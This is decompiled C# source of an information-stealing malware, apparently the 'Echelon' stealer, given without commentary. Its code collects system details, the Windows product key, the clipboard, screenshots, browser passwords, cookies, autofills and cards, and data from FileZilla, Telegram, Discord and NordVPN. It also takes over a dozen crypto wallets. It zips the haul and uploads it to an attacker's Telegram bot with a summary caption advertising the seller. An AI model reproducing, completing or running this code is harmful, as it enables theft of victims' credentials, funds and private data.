// Token: 0x06000242 RID: 578 RVA: 0x00010F34 File Offset: 0x0000F134
public static void GetSystem(string Echelon_Dir)
{
ComputerInfo computerInfo = new ComputerInfo();
Size size = Screen.PrimaryScreen.Bounds.Size;
try
{
using (StreamWriter streamWriter = new StreamWriter(Systemsinfo.information, false, Encoding.Default))
{
TextWriter textWriter = streamWriter;
string[] array = new string[28];
array[0] = "==================================================\n Operating system: ";
int num = 1;
OperatingSystem osversion = Environment.OSVersion;
array[num] = ((osversion != null) ? osversion.ToString() : null);
array[2] = " | ";
array[3] = computerInfo.OSFullName;
array[4] = "\n PC user: "******"/";
array[7] = Environment.UserName;
array[8] = "\n WinKey: ";
array[9] = WinKey.GetWindowsKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId");
array[10] = "\n==================================================\n Screen resolution: ";
int num2 = 11;
Size size2 = size;
array[num2] = size2.ToString();
array[12] = "\n Current time Utc: ";
array[13] = DateTime.UtcNow.ToString();
array[14] = "\n Current time: ";
array[15] = DateTime.Now.ToString();
array[16] = "\n==================================================\n CPU: ";
array[17] = Systemsinfo.GetProcessorName();
array[18] = "\n RAM: ";
array[19] = Systemsinfo.GetPhysicalMemory();
array[20] = "\n GPU: ";
array[21] = Systemsinfo.GetGpuName();
array[22] = "\n ==================================================\n IP Geolocation: ";
array[23] = Help.IP;
array[24] = " ";
array[25] = Help.Country();
array[26] = "\n Log Date: ";
array[27] = Help.date;
textWriter.WriteLine(string.Concat(array));
streamWriter.Close();
}
}
catch
{
}
}
public static void GetSystemsData(string collectionDir)
{
try
{
Task[] t01 = new Task[]
{
new Task(delegate()
{
Systemsinfo.GetSystem(collectionDir);
})
};
Task[] t02 = new Task[]
{
new Task(delegate()
{
Systemsinfo.GetProg(collectionDir);
})
};
Task[] t03 = new Task[]
{
new Task(delegate()
{
Systemsinfo.GetProc(collectionDir);
})
};
Task[] t04 = new Task[]
{
new Task(delegate()
{
BuffBoard.GetClipboard(collectionDir);
})
};
Task[] t05 = new Task[]
{
new Task(delegate()
{
Screenshot.GetScreenShot(collectionDir);
})
};
new Thread(delegate()
{
Task[] t = t01;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = t02;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = t03;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = t04;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = t05;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
Task.WaitAll(t01);
Task.WaitAll(t02);
Task.WaitAll(t03);
Task.WaitAll(t04);
Task.WaitAll(t05);
}
catch
{
}
}
// Token: 0x06000253 RID: 595 RVA: 0x0001126C File Offset: 0x0000F46C
public static void GetCollection()
{
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals1 = new Collection.< > c__DisplayClass2_0();
try
{
Directory.CreateDirectory(Help.collectionDir);
Directory.CreateDirectory(Help.Browsers);
Directory.CreateDirectory(Help.Passwords);
Directory.CreateDirectory(Help.Autofills);
Directory.CreateDirectory(Help.Downloads);
Directory.CreateDirectory(Help.Cookies);
Directory.CreateDirectory(Help.History);
Directory.CreateDirectory(Help.Cards);
}
catch
{
}
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals2 = CS$ < > 8__locals1;
Task[] array = new Task[1];
array[0] = new Task(delegate()
{
Files.GetFiles(Help.collectionDir);
});
CS$ < > 8__locals2.t0 = array;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals3 = CS$ < > 8__locals1;
Task[] array2 = new Task[1];
array2[0] = new Task(delegate()
{
Collection.GetChromium();
});
CS$ < > 8__locals3.t1 = array2;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals4 = CS$ < > 8__locals1;
Task[] array3 = new Task[1];
array3[0] = new Task(delegate()
{
Collection.GetGecko();
});
CS$ < > 8__locals4.t2 = array3;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals5 = CS$ < > 8__locals1;
Task[] array4 = new Task[1];
array4[0] = new Task(delegate()
{
Edge.GetEdge(Help.Passwords);
});
CS$ < > 8__locals5.t3 = array4;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals6 = CS$ < > 8__locals1;
Task[] array5 = new Task[1];
array5[0] = new Task(delegate()
{
FileZilla.GetFileZilla(Help.collectionDir);
});
CS$ < > 8__locals6.t5 = array5;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals7 = CS$ < > 8__locals1;
Task[] array6 = new Task[1];
array6[0] = new Task(delegate()
{
TotalCommander.GetTotalCommander(Help.collectionDir);
});
CS$ < > 8__locals7.t6 = array6;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals8 = CS$ < > 8__locals1;
Task[] array7 = new Task[1];
array7[0] = new Task(delegate()
{
NordVPN.GetNordVPN(Help.collectionDir);
});
CS$ < > 8__locals8.t9 = array7;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals9 = CS$ < > 8__locals1;
Task[] array8 = new Task[1];
array8[0] = new Task(delegate()
{
Telegram.GetTelegram(Help.collectionDir);
});
CS$ < > 8__locals9.t10 = array8;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals10 = CS$ < > 8__locals1;
Task[] array9 = new Task[1];
array9[0] = new Task(delegate()
{
Discord.GetDiscord(Help.collectionDir);
});
CS$ < > 8__locals10.t11 = array9;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals11 = CS$ < > 8__locals1;
Task[] array10 = new Task[1];
array10[0] = new Task(delegate()
{
Wallets.GetWallets(Help.collectionDir);
});
CS$ < > 8__locals11.t12 = array10;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals12 = CS$ < > 8__locals1;
Task[] array11 = new Task[1];
array11[0] = new Task(delegate()
{
Systemsinfo.GetSystemsData(Help.collectionDir);
});
CS$ < > 8__locals12.t13 = array11;
Collection.< > c__DisplayClass2_0 CS$ < > 8__locals13 = CS$ < > 8__locals1;
Task[] array12 = new Task[1];
array12[0] = new Task(delegate()
{
DomainDetect.GetDomainDetect(Help.Browsers);
});
CS$ < > 8__locals13.t14 = array12;
try
{
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t0;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t1;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t2;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t3;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t5;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t6;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t9;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t10;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t11;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t12;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t13;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
new Thread(delegate()
{
Task[] t = CS$ < > 8__locals1.t14;
for (int i = 0; i < t.Length; i++)
{
t[i].Start();
}
}).Start();
Task.WaitAll(CS$ < > 8__locals1.t0);
Task.WaitAll(CS$ < > 8__locals1.t1);
Task.WaitAll(CS$ < > 8__locals1.t2);
Task.WaitAll(CS$ < > 8__locals1.t3);
Task.WaitAll(CS$ < > 8__locals1.t5);
Task.WaitAll(CS$ < > 8__locals1.t6);
Task.WaitAll(CS$ < > 8__locals1.t9);
Task.WaitAll(CS$ < > 8__locals1.t10);
Task.WaitAll(CS$ < > 8__locals1.t11);
Task.WaitAll(CS$ < > 8__locals1.t12);
Task.WaitAll(CS$ < > 8__locals1.t13);
Task.WaitAll(CS$ < > 8__locals1.t14);
}
catch
{
}
try
{
string text = string.Concat(new string[]
{
Help.dir,
"\\",
Help.dateLog,
"_",
Help.HWID,
Help.CountryCOde(),
".zip"
});
using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
{
zipFile.ParallelDeflateThreshold = -1L;
zipFile.UseZip64WhenSaving = 2;
zipFile.CompressionLevel = 6;
zipFile.AddDirectory(Help.collectionDir);
zipFile.Comment = "123 test";
zipFile.Save(text);
}
string text2 = text;
byte[] file = File.ReadAllBytes(text2);
string url = string.Concat(new string[]
{
Help.ApiUrl,
Program.Token,
"/sendDocument?chat_id=",
Program.ID,
string.Concat(new string[]
{
"&caption=\n \ud83c\udf3a new log \ud83c\udf38 \n============================\n\ud83c\udf06IP - ",
Help.IP,
"\n\ud83c\udfd9country - ",
Help.Country(),
"\n============================\n✨browser:\n∟\ud83c\udf6acookies - ",
(Chromium.Cookies + Steal.count_cookies).ToString(),
"\n ∟\ud83d\udd11password - ",
(Chromium.Passwords + Edge.count + Steal.count).ToString(),
"\n ∟\ud83d\udd51History - ",
Chromium.History.ToString(),
"\n ∟\ud83d\udcddAutofills - ",
Chromium.Autofills.ToString(),
"\n ∟\ud83d\udcb3Cards - ",
Chromium.CC.ToString(),
"\n============================",
(Wallets.count > 0) ? "\n\ud83d\udc8e crypto" : "",
(Electrum.count > 0) ? "\n∟Electrum" : "",
(Armory.count > 0) ? "\n∟Armory" : "",
(AtomicWallet.count > 0) ? "\n∟Atomic" : "",
(BitcoinCore.count > 0) ? "\n∟BitcoinCore" : "",
(Bytecoin.count > 0) ? "\n∟Bytecoin" : "",
(DashCore.count > 0) ? "\n∟DashCore" : "",
(Ethereum.count > 0) ? "\n∟Ethereum" : "",
(Exodus.count > 0) ? "\n∟Exodus" : "",
(LitecoinCore.count > 0) ? "\n∟LitecoinCore" : "",
(Monero.count > 0) ? "\n∟Monero" : "",
(Zcash.count > 0) ? "\n∟Zcash" : "",
(Jaxx.count > 0) ? "\n∟Jaxx" : "",
(Wallets.count > 0) ? "\n============================" : "",
(FileZilla.count > 0) ? ("\n\ud83d\udcc2FileZilla - " + FileZilla.count.ToString()) : "",
(FileZilla.count > 0) ? "\n============================ " : "",
"\n\ud83d\udcbefree buld\n\ud83d\udcc0by full - @Mist_Seller\n============================\n",
File.ReadAllText(Help.Browsers + "\\DomainDetect.txt")
})
});
SenderAPI.POST(file, text2, "application/x-ms-dos-executable", url);
}
catch
{
}
}